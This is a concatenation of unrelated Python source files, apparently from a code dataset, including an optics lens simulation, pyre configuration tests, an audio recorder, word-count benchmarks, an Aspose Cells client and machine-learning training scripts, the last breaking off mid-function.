                        ContractId('0:0', template_id='some_unknown_template'),
                        dict(some_field='some_value'), datetime.utcnow())
        lines = fmt_pretty.format_entries(capture, parties)
        output = '\n'.join(lines) + '\n'
        # Smoke check only: formatting must not raise and must emit something.
        self.assertTrue(output, 'some lines of output expected')
|
10,573 | 498362acf26b69038f6b77fadca5968259e293a7 | #!/usr/bin/python
#coding=utf-8
fo = open("dir/test.txt", "r+")
#读取10个字节
str = fo.read(10)
print str
postion = fo.tell()
print "Curr file postion", postion
fo.seek(1, 1)
str = fo.read(10)
print str
#记得关闭
fo.close()
|
10,574 | 7089fe1a58a4437f215b6ae977b081dff4e2a930 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Mar 20 17:32:23 2020
@author: carlotal
"""
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.widgets import Slider, Button
import proper
def objet_def(D, D_ratio, N):
    """Build the N x N binary test object.

    The object is a disc of diameter D*D_ratio centred in a window of width D,
    with a small hole (1/50 of the disc diameter) punched out at
    (0.3, 0.1) * D * D_ratio.  Returned as an integer 0/1 array.
    """
    # Pixel-centre coordinates spanning the window.
    coords = np.linspace(-D / 2, D / 2, N, endpoint=False) + D / (2.0 * N)
    grid_x, grid_y = np.meshgrid(coords, coords, sparse=False)
    radius = np.sqrt(grid_x ** 2 + grid_y ** 2)
    disc_radius = D * D_ratio / 2
    hole_x = 0.3 * D * D_ratio
    hole_y = 0.1 * D * D_ratio
    hole = np.sqrt((grid_x - hole_x) ** 2 + (grid_y - hole_y) ** 2) < disc_radius / 50
    return (radius < disc_radius) * (1 - hole)
plt.close('all')
# erreur_position = 2*1e-3  # positioning error of the optics, in metres (FWHM of a Gaussian centred on the true value)
lbd = 0.55*1e-6  # wavelength (m)
#focal length of lenses
foc_library = np.array([-100,50,100,200,250,500])
foc_library_rand = np.zeros(len(foc_library))
for k in range(len(foc_library)):
    # Perturb each focal length (~20% FWHM; 2.355 sigma) so it must be measured.
    foc_library_rand[k] = np.random.normal(foc_library[k], np.abs(foc_library[k]*20/100/2.355)) #students will need to measure the focal length!
#lens_rand_index = np.random.permutation(len(foc_library))
#foc_library_rand = foc_library[lens_rand_index] #randomization of the lens library:
fig,ax = plt.subplots(1,3,figsize=[16,8])
plt.subplots_adjust(bottom=0.32)
# Parameters (distances in mm)
N_simu = 500
object_size_0 = 2
D_ratio = 0.8
window_size = object_size_0/D_ratio
#object_size_0 += np.random.normal(0,1e-3/2.355)
number_L1_0 = 3
number_L2_0 = 3
number_L3_0 = 3
distance_object_L1_0 = 220
distance_object_L3_0 = 200
distance_L3_L3_0 = 100
distance_L1_L2_0 = 300
distance_L2_screen_0 = 200
#delta focus (in mm)
delta_focus = 1
#initialization of function
objet = objet_def(window_size,D_ratio,N_simu)
# Path 1: object -> L1 -> L2 -> screen (imaging arm).  mm are converted to m.
onde_1 = proper.prop_begin(window_size*1e-3, lbd, N_simu, D_ratio)
proper.prop_multiply(onde_1, objet)
proper.prop_define_entrance(onde_1)
A_object_1 = np.abs(proper.prop_get_amplitude(onde_1))**2
A_object_1 /= np.max(A_object_1)
L_object_1 = D_ratio*N_simu*proper.prop_get_sampling(onde_1)*1e3
proper.prop_propagate(onde_1, distance_object_L1_0*1e-3)
proper.prop_lens(onde_1,foc_library_rand[number_L1_0]*1e-3)
proper.prop_propagate(onde_1, distance_L1_L2_0*1e-3)
proper.prop_lens(onde_1, foc_library_rand[number_L2_0]*1e-3)
proper.prop_propagate(onde_1, distance_L2_screen_0*1e-3)
A_screen = np.abs(proper.prop_get_amplitude(onde_1))**2
L_screen = D_ratio*N_simu*proper.prop_get_sampling(onde_1)*1e3
# Normalize the screen energy to the object's.
A_screen *= np.sum(A_object_1)/np.sum(A_screen)#*(L_object/L_screen)**2
# Path 3: autocollimation arm — object -> L3 -> L3 -> back to the object plane.
onde_3 = proper.prop_begin(window_size*1e-3, lbd, N_simu, D_ratio)
proper.prop_multiply(onde_3, objet)
proper.prop_define_entrance(onde_3)
A_object_3 = np.abs(proper.prop_get_amplitude(onde_3))**2
A_object_3 /= np.max(A_object_3)
L_object_3 = D_ratio*N_simu*proper.prop_get_sampling(onde_3)*1e3
proper.prop_propagate(onde_3, distance_object_L3_0*1e-3)
proper.prop_lens(onde_3,foc_library_rand[number_L3_0]*1e-3)
proper.prop_propagate(onde_3, distance_L3_L3_0*1e-3)
proper.prop_lens(onde_3, foc_library_rand[number_L3_0]*1e-3)
proper.prop_propagate(onde_3, distance_object_L3_0*1e-3)
A_collim = np.abs(proper.prop_get_amplitude(onde_3))**2
L_collim = D_ratio*N_simu*proper.prop_get_sampling(onde_3)*1e3
A_collim *= np.sum(A_object_3)/np.sum(A_collim)
#plot
l_1 = ax[0].imshow(A_object_3,extent=(-L_object_3/2,L_object_3/2,-L_object_3/2,L_object_3/2),cmap='gray',vmin=0,vmax=1.2)
ax[0].set_title('Objet physique')
l_2 = ax[1].imshow(A_screen,extent=(-L_screen/2,L_screen/2,-L_screen/2,L_screen/2),cmap='gray',vmin=0,vmax=1.2)
ax[1].set_title('Lumière sur l\'écran après L2')
l_3 = ax[2].imshow(A_collim+A_object_3,extent=(-L_collim/2,L_collim/2,-L_collim/2,L_collim/2),cmap='gray',vmin=0,vmax=2.4)
ax[2].set_title('Image autocollimation L3')
ax[2].set_axis_off()
#ax.margins(x=0)
axcolor = 'white'
# One horizontal slider axis per adjustable parameter, stacked below the plots.
ax_object_size = plt.axes([0.25, 0.1, 0.65, 0.02], facecolor=axcolor)
ax_L1_focal_length = plt.axes([0.25, 0.13, 0.65, 0.02], facecolor=axcolor)
ax_L2_focal_length = plt.axes([0.25, 0.16, 0.65, 0.02], facecolor=axcolor)
ax_L3_focal_length = plt.axes([0.25, 0.19, 0.65, 0.02], facecolor=axcolor)
ax_distance_object_L1 = plt.axes([0.25, 0.22, 0.65, 0.02], facecolor=axcolor)
ax_distance_object_L3 = plt.axes([0.25, 0.25, 0.65, 0.02], facecolor=axcolor)
ax_distance_L1_L2 = plt.axes([0.25, 0.28, 0.65, 0.02], facecolor=axcolor)
ax_distance_L2_screen = plt.axes([0.25, 0.31, 0.65, 0.02], facecolor=axcolor)
#Sliders
s_object_size = Slider(ax_object_size,'Taille objet',1,10,valinit=object_size_0,valstep = 0.5)
s_number_L1 = Slider(ax_L1_focal_length,'Numéro lentille L1',1,len(foc_library),valinit=number_L1_0,valstep=delta_focus)
s_number_L2 = Slider(ax_L2_focal_length,'Numéro lentille L2',1,len(foc_library),valinit=number_L2_0,valstep=delta_focus)
s_number_L3 = Slider(ax_L3_focal_length,'Numéro lentille L3 (autocollimation)',1,len(foc_library),valinit=number_L3_0,valstep=delta_focus)
s_distance_object_L1 = Slider(ax_distance_object_L1,'Distance Objet L1',0,600,valinit=distance_object_L1_0,valstep = 1)
s_distance_object_L3 = Slider(ax_distance_object_L3,'Distance Objet L3 (autocollimation)',0,600,valinit=distance_object_L3_0,valstep = 1)
s_distance_L1_L2 = Slider(ax_distance_L1_L2,'Distance L1 L2',0,1000,valinit=distance_L1_L2_0,valstep = 1)
s_distance_L2_screen = Slider(ax_distance_L2_screen,'Distance L2 écran',0,600,valinit=distance_L2_screen_0,valstep = 1)
def update(val):
    """Slider callback: rerun both propagations with the current slider
    values and refresh the three images in place.

    `val` (the changed slider's value) is unused; all values are read back
    from the sliders directly.  Slider values are mm; proper expects metres.
    """
    n_object_size = s_object_size.val*1e-3
    n_window_size = n_object_size/D_ratio
    # Slider positions are 1-based lens numbers; the arrays are 0-based.
    n_number_L1 = int(s_number_L1.val-1)
    n_number_L2 = int(s_number_L2.val-1)
    n_number_L3 = int(s_number_L3.val-1)
    n_distance_object_L1 = s_distance_object_L1.val*1e-3
    n_distance_object_L3 = s_distance_object_L3.val*1e-3
    n_distance_L1_L2 = s_distance_L1_L2.val*1e-3
    n_distance_L3_L3 = distance_L3_L3_0*1e-3
    n_distance_L2_screen = s_distance_L2_screen.val*1e-3
    n_objet = objet_def(n_window_size,D_ratio,N_simu)
    # Path 1: object -> L1 -> L2 -> screen.
    onde_1 = proper.prop_begin(n_window_size, lbd, N_simu, D_ratio)
    proper.prop_multiply(onde_1, n_objet)
    proper.prop_define_entrance(onde_1)
    A_object_1 = np.abs(proper.prop_get_amplitude(onde_1))**2
    A_object_1 /= np.max(A_object_1)
    #L_object_1 = D_ratio*N_simu*proper.prop_get_sampling(onde_1)*1e3
    proper.prop_propagate(onde_1, n_distance_object_L1)
    proper.prop_lens(onde_1,foc_library_rand[n_number_L1]*1e-3)
    proper.prop_propagate(onde_1, n_distance_L1_L2)
    proper.prop_lens(onde_1, foc_library_rand[n_number_L2]*1e-3)
    proper.prop_propagate(onde_1, n_distance_L2_screen)
    A_screen = np.abs(proper.prop_get_amplitude(onde_1))**2
    L_screen = D_ratio*N_simu*proper.prop_get_sampling(onde_1)*1e3
    A_screen *= np.sum(A_object_1)/np.sum(A_screen)#*(L_object/L_screen)**2
    # Path 3: the autocollimation arm through L3 twice.
    onde_3 = proper.prop_begin(n_window_size, lbd, N_simu, D_ratio)
    proper.prop_multiply(onde_3, n_objet)
    proper.prop_define_entrance(onde_3)
    A_object_3 = np.abs(proper.prop_get_amplitude(onde_3))**2
    A_object_3 /= np.max(A_object_3)
    L_object_3 = D_ratio*N_simu*proper.prop_get_sampling(onde_3)*1e3
    proper.prop_propagate(onde_3, n_distance_object_L3)
    proper.prop_lens(onde_3,foc_library_rand[n_number_L3]*1e-3)
    proper.prop_propagate(onde_3, n_distance_L3_L3)
    proper.prop_lens(onde_3, foc_library_rand[n_number_L3]*1e-3)
    proper.prop_propagate(onde_3, n_distance_object_L3)
    A_collim = np.abs(proper.prop_get_amplitude(onde_3))**2
    L_collim = D_ratio*N_simu*proper.prop_get_sampling(onde_3)*1e3
    A_collim *= np.sum(A_object_3)/np.sum(A_collim)
    # Push the new images and extents into the existing artists.
    l_1.set_data(A_object_3)
    l_1.set_extent((-L_object_3/2,L_object_3/2,-L_object_3/2,L_object_3/2))
    l_2.set_data(A_screen)
    l_2.set_extent((-L_screen/2,L_screen/2,-L_screen/2,L_screen/2))
    l_3.set_data(A_collim+A_object_3)
    l_3.set_extent((-L_collim/2,L_collim/2,-L_collim/2,L_collim/2))
    fig.canvas.draw_idle()
# Recompute the propagation whenever any slider moves.
s_object_size.on_changed(update)
s_number_L1.on_changed(update)
s_number_L2.on_changed(update)
s_number_L3.on_changed(update)
s_distance_object_L1.on_changed(update)
s_distance_object_L3.on_changed(update)
s_distance_L1_L2.on_changed(update)
s_distance_L2_screen.on_changed(update)
# Reset button in the lower-right corner.
resetax = plt.axes([0.8, 0.025, 0.1, 0.04])
button = Button(resetax, 'Reset', color=axcolor, hovercolor='0.975')
def reset(event):
    """Button callback: restore every slider to its initial value.

    Each Slider.reset() that changes a value fires the update() callback,
    so the figure redraws automatically.
    """
    s_object_size.reset()
    s_number_L1.reset()
    s_number_L2.reset()
    s_number_L3.reset()
    s_distance_object_L1.reset()
    s_distance_object_L3.reset()
    s_distance_L1_L2.reset()
    s_distance_L2_screen.reset()
# plt.show()
|
10,575 | 995a5a8e71a90ab0a3dfab73972b4dede8fe5fc1 | # Copyright (c) 2016-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# pyre-unsafe
import unittest
from unittest.mock import patch
from .. import find_directories
from ..find_directories import find_local_root, find_project_root, find_root
class InitTest(unittest.TestCase):
    """Tests for find_directories: configuration discovery by walking up the tree."""

    @patch("os.path.isfile")
    def test_find_configuration(self, os_mock_isfile) -> None:
        # Walks upward from /a/b/c/d; the fourth isfile probe (/a) succeeds.
        os_mock_isfile.side_effect = [False, False, False, True]
        self.assertEqual(find_root("/a/b/c/d", "configuration"), "/a")
        os_mock_isfile.side_effect = [True]
        self.assertEqual(find_root("/a", "configuration"), "/a")
        # No configuration anywhere up to the root -> None.
        os_mock_isfile.side_effect = [False, False, False]
        self.assertEqual(find_root("/a/b", "configuration"), None)

    def test_find_project_root(self) -> None:
        original_directory = "/a/b/c"
        with patch("os.path.realpath", return_value="realpath"), patch(
            "os.path.isfile", return_value=False
        ) as isfile, patch("os.getcwd", return_value="/a/b/c"):
            # Only /a/b/.pyre_configuration exists -> project root is /a/b.
            isfile.side_effect = (
                lambda directory: directory == "/a/b/.pyre_configuration"
            )
            directory = find_project_root(original_directory)
            self.assertEqual(directory, "/a/b")
        with patch.object(find_directories, "find_root") as mock_find_root:
            original_directory = "/a/b"
            # Global root (/a) found above the local root (/a/b) wins.
            mock_find_root.side_effect = ["/a", "/a/b"]
            directory = find_project_root(original_directory)
            self.assertEqual(directory, "/a")

    def test_find_local_root(self) -> None:
        original_directory = "/a/b/c"
        with patch("os.path.realpath", return_value="realpath"), patch(
            "os.path.isfile", return_value=False
        ) as isfile:
            # No .pyre_configuration.local anywhere -> None.
            local_root = find_local_root(original_directory)
            self.assertEqual(local_root, None)
            isfile.side_effect = (
                lambda directory: directory == "/a/b/.pyre_configuration.local"
            )
            local_root = find_local_root(original_directory)
            self.assertEqual(local_root, "/a/b")
|
10,576 | 4f80c9fb7da79c95f325cde7017766dc74288b59 | #Resposta do exercicio 1.Faça um programa que receba a idade do usuário e diga se ele é maior ou menor de idade.
def ageCheck(ageUser=None):
    """Return True if the given age is 18 or older, else False.

    BUG FIX: the original declared ``ageUser=int(input(...))`` as the default
    argument, so the prompt ran exactly once -- at function *definition* time,
    i.e. on import -- and every later call silently reused that first answer.
    Prompting is now deferred to call time, and only when no age is supplied.

    :param ageUser: age in years; if None, the user is prompted interactively.
    """
    if ageUser is None:
        ageUser = int(input("how old are you?"))
    return ageUser >= 18


if __name__ == "__main__":
    # Keep the interactive demo, but only when run as a script (not on import).
    print(ageCheck())
|
10,577 | c4645c56d30caa3253c654d215b5e28256159a15 | import config as c
import numpy as np
from pathlib import Path
import matplotlib.pyplot as plt
import data.data_helpers as data_helpers
import data.prepare_data as prepare_data
import evaluate
from evaluate import compute_calibration,sample_posterior
import time
import torch
#compute_calibration = evaluate.compute_calibration
#sample_posterior = evaluate.sample_posterior
x_all, y_all, ana_all = data_helpers.concatenate_test_set(c.evaluation_samples)
def show_error_correlations(x=x_all, y=y_all, load=False):
    """Scatter-plot CO2 prediction errors and estimated uncertainties against
    retrieval parameters and spectra features.

    NOTE(review): the defaults bind the module-level test set at import time.

    :param x: network inputs (normalised parameters)
    :param y: network conditions (normalised spectra)
    :param load: forwarded to compute_calibration (True = use cached results)
    """
    #plot error co2 against: xco2, "albedo_o2","albedo_sco2","albedo_wco2", "tcwv" 4
    #and: "year","xco2_apriori","altitude","psurf","t700","longitude","latitude" 7
    #"snr_wco2","snr_sco2","snr_o2a","aod_bc","aod_dust","aod_ice","aod_oc","aod_seasalt","aod_sulfate","aod_total","aod_water"
    params = prepare_data.x_to_params(x)
    spectra = prepare_data.y_to_spectra(y)
    post = sample_posterior(y)
    # NOTE(review): this torch-based diff is overwritten a few lines below and
    # never used -- confirm whether it can be removed.
    diff = torch.mean(torch.FloatTensor(post), dim=1) - x
    #post_params =prepare_data.x_to_params(post)
    _, _, uncert_intervals, _, post_params = compute_calibration(x, y, load=load)
    # Half interval width at index 68 -- presumably the 68% confidence
    # interval for CO2; TODO confirm against compute_calibration.
    uncert_error_co2 = uncert_intervals[68, :, c.co2_pos] / 2
    diff = np.mean(post_params, axis=1) - params
    diff_co2 = diff[:, 0]
    error_name = ['error_correlations', 'estimated_error_correlations']
    # l == 0: physical parameters/spectra; l == 1: raw network inputs/conditions.
    # NOTE(review): the loop variables shadow `spectra` and (below) `diff`.
    for l, spectra in enumerate([spectra, np.array(y)]):
        if l == 1:
            params = np.array(x)
        # k == 0: actual CO2 error; k == 1: estimated uncertainty.
        for k, diff in enumerate([diff_co2, uncert_error_co2]):
            plt.figure(error_name[k] + f'_{l}', figsize=(20, 15))
            plt.title(error_name[k] + f'_{l}')
            print(diff.shape)
            horizontal_figures = 4
            vertical_figures = 6
            # Clip extreme errors so the scatter plots stay readable.
            diff = np.clip(diff, -4, 4)
            # First column of every row: histogram of the clipped error values.
            for i in range(horizontal_figures):
                ax = plt.subplot(horizontal_figures, vertical_figures, vertical_figures * i + 1)
                bins = np.linspace(np.min(diff), np.max(diff), 100)
                plt.hist(diff, bins=bins, histtype='step', color="lightskyblue", orientation="horizontal")
                if i > 0:
                    #ax.axis('off')
                    ax.set_xticks([])
                plt.ylabel(f"error of prediction in ppm")
            # Remaining grid: error vs. parameters (row 0) and vs. slices of
            # the spectra features (rows 1-3, stepping 5 features per row).
            for i in range(horizontal_figures):
                for j in range(vertical_figures - 1):
                    ax = plt.subplot(horizontal_figures, vertical_figures, vertical_figures * i + j + 2)
                    if i == 0:
                        ax.xaxis.tick_top()
                        #plt.xlabel(c.param_names[i])
                        ax.set_xlabel(prepare_data.params_names[j])
                        ax.xaxis.set_label_position('top')
                        #plt.scatter(params[:, j],diff[:, 0],s=0.5,alpha=0.2,color="green")
                        plt.scatter(params[:, j], diff, s=1, alpha=0.3, color="blue")
                        #plt.ylabel(f"{prepare_data.params_names[j]}")
                    if i == 1:
                        plt.scatter(spectra[:, -j - 1], diff, s=1, alpha=0.3, color="blue")
                        #plt.ylabel(f"{prepare_data.spectra_names[-j]}")
                        ax.set_xlabel(prepare_data.spectra_names[-j - 1])
                        ax.xaxis.set_label_position('top')
                    if i == 2:
                        plt.scatter(spectra[:, -j - 5 - 1], diff, s=1, alpha=0.3, color="blue")
                        ax.set_xlabel(f"{prepare_data.spectra_names[-j - 5 - 1]}")
                    if i == 3:
                        plt.scatter(spectra[:, -j - 10 - 1], diff, s=1, alpha=0.3, color="blue")
                        ax.set_xlabel(f"{prepare_data.spectra_names[-j - 10 - 1]}")
if __name__ == "__main__":
    # Recompute the calibration (load=False) and display all figures.
    show_error_correlations(load=False)
    plt.show()
10,578 | ffbb6fab14fdbf40b5c23b1c5fc6e55b8fcaadbd | '''
Link: https://www.codechef.com/DEM2020/problems/TOWIN
'''
from sys import stdin,stdout
# One line with the test-case count, then per case: n and n pile values.
for _ in range(int(stdin.readline())):
    n = int(stdin.readline())
    piles = sorted(map(int, stdin.readline().split()), reverse=True)
    if n == 1:
        # A single pile always goes to the first player.
        stdout.write('first\n')
    elif n == 2:
        stdout.write('draw\n' if piles[0] == piles[1] else 'first\n')
    else:
        # In descending order, player one takes piles 0, 3, 5, 7, ... and
        # player two takes piles 1, 2, 4, 6, ... -- identical to the original
        # n == 3 special case and the general alternating loop.
        first = piles[0] + sum(piles[3::2])
        second = piles[1] + piles[2] + sum(piles[4::2])
        if second > first:
            stdout.write('second\n')
        elif second < first:
            stdout.write('first\n')
        else:
            stdout.write('draw\n')
|
10,579 | 5b62d818c133391728b22cbbc8b5889c6e0b3e72 |
from aspose.cloud.common.product import Product
from aspose.cloud.common.utils import Utils
from aspose.cloud.common.asposeapp import AsposeApp
class CellsExtractor(object):
    """Extracts embedded objects (pictures, OLE objects, charts, autoshapes)
    from a worksheet through the Aspose Cells cloud API.

    All four public methods previously duplicated the same request/download
    flow; it now lives once in ``_extract``.
    """

    file_name = ""

    def __init__(self, file_name):
        self.file_name = file_name

    def _extract(self, worksheet_name, resource, index, image_format):
        """Download one embedded object and return the local output path.

        :param worksheet_name: worksheet to read from
        :param resource: REST collection name ("pictures", "oleobjects",
            "charts" or "autoshapes")
        :param index: zero-based index inside that collection
        :param image_format: target image format (also used as file extension)
        :returns: saved file path on success, otherwise the service error text
        :raises Exception: if no file name was configured
        """
        if self.file_name == "":
            raise Exception("Please Specify File Name")
        str_uri = (Product.base_product_uri + "/cells/" + self.file_name +
                   "/worksheets/" + worksheet_name + "/" + resource + "/" +
                   str(index) + "?format=" + image_format)
        signed_uri = Utils.sign(Utils(), str_uri)
        response_stream = Utils.process_command(Utils(), signed_uri, "GET", "", "")
        v_output = Utils.validate_output(Utils(), response_stream)
        if v_output == "":
            output_path = (AsposeApp.output_location +
                           Utils.get_filename(Utils(), self.file_name) +
                           "_" + worksheet_name + "." + image_format)
            Utils.save_file(Utils(), response_stream, output_path)
            return output_path
        return v_output

    def get_picture(self, worksheet_name, picture_index, image_format):
        """Extract a picture; see _extract for the return contract."""
        return self._extract(worksheet_name, "pictures", picture_index, image_format)

    def get_oleobject(self, worksheet_name, oleobject_index, image_format):
        """Extract an OLE object; see _extract for the return contract."""
        return self._extract(worksheet_name, "oleobjects", oleobject_index, image_format)

    def get_chart(self, worksheet_name, chart_index, image_format):
        """Extract a chart; see _extract for the return contract."""
        return self._extract(worksheet_name, "charts", chart_index, image_format)

    def get_autoshape(self, worksheet_name, autoshape_index, image_format):
        """Extract an autoshape; see _extract for the return contract."""
        return self._extract(worksheet_name, "autoshapes", autoshape_index, image_format)
10,580 | 7ab65cbcd089fafaa532981c1ae34a820d1a2d71 | import os
import pyaudio
import wave
import time as t
# Recording configuration.
FORMAT = pyaudio.paInt16          # 16-bit samples
CHANNELS = 1
RATE = 48000                      # sample rate in Hz
CHUNK = 1024                      # frames read per buffer
RECORD_SECONDS = 3
WAVE_OUTPUT_FILENAME = "file2.wav"

audio = pyaudio.PyAudio()

# BUG FIX: banner said "Bith depth".
print("Bit depth: 16")
print(f"Sample rate: {RATE}")
print(f"Chunk size: {CHUNK}")
print(f"Recording time: {RECORD_SECONDS} seconds")
print(f"Output file name: {WAVE_OUTPUT_FILENAME}")
print()

stream = audio.open(format=FORMAT, channels=CHANNELS,
                    rate=RATE, input=True,
                    frames_per_buffer=CHUNK)
print("recording...")

frames = []
start_sensing = t.time()
for _ in range(int(RATE / CHUNK * RECORD_SECONDS)):
    frames.append(stream.read(CHUNK))
end_sensing = t.time()
# BUG FIX: elapsed time is end - start; the original computed start - end
# and always reported a negative duration.
sensing_time = end_sensing - start_sensing
print("finished recording")

# Stop recording and release the audio resources.
stream.stop_stream()
stream.close()
audio.terminate()

# Write the captured frames to disk as a WAV file and time the operation.
t_start_storing = t.time()
waveFile = wave.open(WAVE_OUTPUT_FILENAME, 'wb')
waveFile.setnchannels(CHANNELS)
waveFile.setsampwidth(audio.get_sample_size(FORMAT))
waveFile.setframerate(RATE)
waveFile.writeframes(b''.join(frames))
waveFile.close()
t_end_storing = t.time()

print(f"time for sensing the audio: {sensing_time}")
print(f"Time for storing the data on disk: {round(t_end_storing-t_start_storing, 4)} seconds")
# Use the configured name instead of the hard-coded "./file2.wav".
wav_size = os.path.getsize(WAVE_OUTPUT_FILENAME)
print(f"The size of the wav file is: {int(wav_size/1024)} KiloBytes")
10,581 | bdca99266a45df63c56d1a1d9d49fe0441a417f7 | import os
from concurrent.futures import ThreadPoolExecutor
import pytest
import word_count
current_dir = os.path.abspath(os.path.dirname(__file__))
# NOTE(review): `path` is built but never used in this module -- confirm
# whether the zen-of-python.txt fixture file is still needed.
path = os.path.join(current_dir, "zen-of-python.txt")
@pytest.fixture(scope="session")
def contents() -> str:
    """Session-scoped haystack fixture: the Zen of Python repeated 1000 times."""
    text = """
The Zen of Python, by Tim Peters
Beautiful is better than ugly.
Explicit is better than implicit.
Simple is better than complex.
Complex is better than complicated.
Flat is better than nested.
Sparse is better than dense.
Readability counts.
Special cases aren't special enough to break the rules.
Although practicality beats purity.
Errors should never pass silently.
Unless explicitly silenced.
In the face of ambiguity, refuse the temptation to guess.
There should be one-- and preferably only one --obvious way to do it.
Although that way may not be obvious at first unless you're Dutch.
Now is better than never.
Although never is often better than *right* now.
If the implementation is hard to explain, it's a bad idea.
If the implementation is easy to explain, it may be a good idea.
Namespaces are one honking great idea -- let's do more of those!
"""
    return text * 1000
def test_word_count_rust_parallel(benchmark, contents):
    """Benchmark the parallel Rust search; "is" occurs 10x per repetition."""
    count = benchmark(word_count.search, contents, "is")
    assert count == 10000
def test_word_count_rust_sequential(benchmark, contents):
    """Benchmark the single-threaded Rust search on the same haystack."""
    count = benchmark(word_count.search_sequential, contents, "is")
    assert count == 10000
def test_word_count_python_sequential(benchmark, contents):
    """Benchmark the pure-Python reference implementation for comparison."""
    count = benchmark(word_count.search_py, contents, "is")
    assert count == 10000
def run_rust_sequential_twice(
    executor: ThreadPoolExecutor, contents: str, needle: str
) -> int:
    """Submit two GIL-releasing sequential searches concurrently and sum the counts."""
    futures = [
        executor.submit(word_count.search_sequential_allow_threads, contents, needle)
        for _ in range(2)
    ]
    return sum(future.result() for future in futures)
def test_word_count_rust_sequential_twice_with_threads(benchmark, contents):
    """Benchmark two concurrent GIL-releasing sequential searches.

    FIX: use the executor as a context manager so the worker threads are
    joined and released after the benchmark (the original leaked them).
    """
    with ThreadPoolExecutor(max_workers=2) as executor:
        count = benchmark(run_rust_sequential_twice, executor, contents, "is")
    assert count == 20000
|
10,582 | 2ed3ae4a0164c559ca4f30d814ccb33a91e80fa4 | print('%5i%5i' % (10, 235))
print('%5i%5i' % (1000, 50)) |
10,583 | d2b408f24bd2f587df74aef003b1f97337bfdc4a | from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
from sklearn.naive_bayes import GaussianNB
# Train and evaluate a Gaussian Naive Bayes classifier on the iris dataset.
iris = load_iris()
print(iris)
X = iris.data
y = iris.target
print(X.shape)
print(y.shape)
# Fixed seed keeps the train/test split reproducible across runs.
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=84)
model = GaussianNB()
model.fit(X_train, y_train)
print(model.score(X_train, y_train))
print(model.score(X_test, y_test))
print(model.predict(X_test[0:1]))
# BUG FIX: the original called model.predict(y_test[0]) -- passing a scalar
# *label* to predict() raises; the intent was to show the true label for
# comparison with the prediction printed above.
print(y_test[0])
10,584 | 9c907d6c7f1022eceec96537deaebbac21036227 | import numpy as np
from keras.datasets import cifar100
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Sequential
from keras.layers.core import Dense, Dropout, Activation, Flatten
from keras.layers.convolutional import Convolution2D, MaxPooling2D
from keras.optimizers import SGD
from keras.utils import np_utils, generic_utils
'''
Train a (fairly simple) deep CNN on the CIFAR10 small images dataset.
GPU run command:
THEANO_FLAGS=mode=FAST_RUN,device=gpu,floatX=float32 python cifar10_cnn.py
It gets down to 0.65 test logloss in 25 epochs, and down to 0.55 after 50 epochs.
(it's still underfitting at that point, though).
'''
batch_size = 128
nb_classes = 10          # each worker trains on one 10-class slice of CIFAR-100
nb_epoch = 1
data_augmentation = True
# (best_epoch, best_score) per run.  NOTE(review): train_data appends to this
# list, but if it runs in child processes the parent's copy is never updated
# -- confirm the intended result-collection mechanism.
all_time_best = []
import time
from random import random
def train_data(ds_idx):
    """Train a small CNN on the ds_idx-th 10-class slice of CIFAR-100 (Python 2 / old Keras API)."""
    # Random stagger (up to ~83 min) -- presumably to avoid workers loading
    # the dataset simultaneously; TODO confirm the intended unit (seconds).
    time.sleep(5000 * random())
    # the data, shuffled and split between tran and test sets
    (X_train, y_train), (X_test, y_test) = cifar100.load_data(test_split=0.15)
    # Keep only labels in [ds_idx*10, (ds_idx+1)*10).
    train_idx = np.where((y_train >= ds_idx * 10) & (y_train < (1 + ds_idx) * 10))[0]
    test_idx = np.where((y_test >= ds_idx * 10) & (y_test < (1 + ds_idx) * 10))[0]
    X_train = np.array([X_train[i] for i in train_idx])
    y_train = np.array([y_train[i] for i in train_idx])
    X_test = np.array([X_test[i] for i in test_idx])
    y_test = np.array([y_test[i] for i in test_idx])
    print X_train.shape[0], 'train samples'
    print X_test.shape[0], 'test samples'
    # Re-base the labels of this slice to 0..9.
    y_train -= ds_idx * 10
    y_test -= ds_idx * 10
    # convert class vectors to binary class matrices
    Y_train = np_utils.to_categorical(y_train, nb_classes)
    Y_test = np_utils.to_categorical(y_test, nb_classes)
    # Two conv/pool stages followed by a dense classifier (legacy Keras layer
    # signatures: Convolution2D(filters, in_channels, rows, cols)).
    model = Sequential()
    model.add(Convolution2D(32, 3, 3, 3, border_mode='full'))
    model.add(Activation('relu'))
    model.add(Dropout(0.8))
    model.add(Convolution2D(32, 32, 3, 3))
    model.add(Activation('relu'))
    model.add(MaxPooling2D(poolsize=(2, 2)))
    model.add(Dropout(0.75))
    model.add(Convolution2D(64, 32, 3, 3, border_mode='full'))
    model.add(Activation('relu'))
    model.add(Dropout(0.7))
    model.add(Convolution2D(64, 64, 3, 3))
    model.add(Activation('relu'))
    model.add(MaxPooling2D(poolsize=(2, 2)))
    model.add(Dropout(0.6))
    model.add(Flatten(64*8*8))
    model.add(Dense(64*8*8, 512, init='normal'))
    model.add(Activation('relu'))
    model.add(Dropout(0.5))
    model.add(Dense(512, nb_classes, init='normal'))
    model.add(Activation('softmax'))
    # let's train the model using SGD + momentum (how original).
    sgd = SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True)
    model.compile(loss='categorical_crossentropy', optimizer=sgd)
    if not data_augmentation:
        print "Not using data augmentation or normalization"
        X_train = X_train.astype("float32")
        X_test = X_test.astype("float32")
        X_train /= 255
        X_test /= 255
        model.fit(X_train, Y_train, batch_size=batch_size, nb_epoch=10)
        score = model.evaluate(X_test, Y_test, batch_size=batch_size)
        print 'Test score:', score
    else:
        print "Using real time data augmentation"
        # this will do preprocessing and realtime data augmentation
        datagen = ImageDataGenerator(
            featurewise_center=True,  # set input mean to 0 over the dataset
            samplewise_center=False,  # set each sample mean to 0
            featurewise_std_normalization=True,  # divide inputs by std of the dataset
            samplewise_std_normalization=False,  # divide each input by its std
            zca_whitening=False,  # apply ZCA whitening
            rotation_range=20,  # randomly rotate images in the range (degrees, 0 to 180)
            width_shift_range=0.3,  # randomly shift images horizontally (fraction of total width)
            height_shift_range=0.3,  # randomly shift images vertically (fraction of total height)
            horizontal_flip=True,  # randomly flip images
            vertical_flip=False)  # randomly flip images
        # compute quantities required for featurewise normalization
        # (std, mean, and principal components if ZCA whitening is applied)
        datagen.fit(X_train)
        best_score = 0.0
        best_epoch = 0
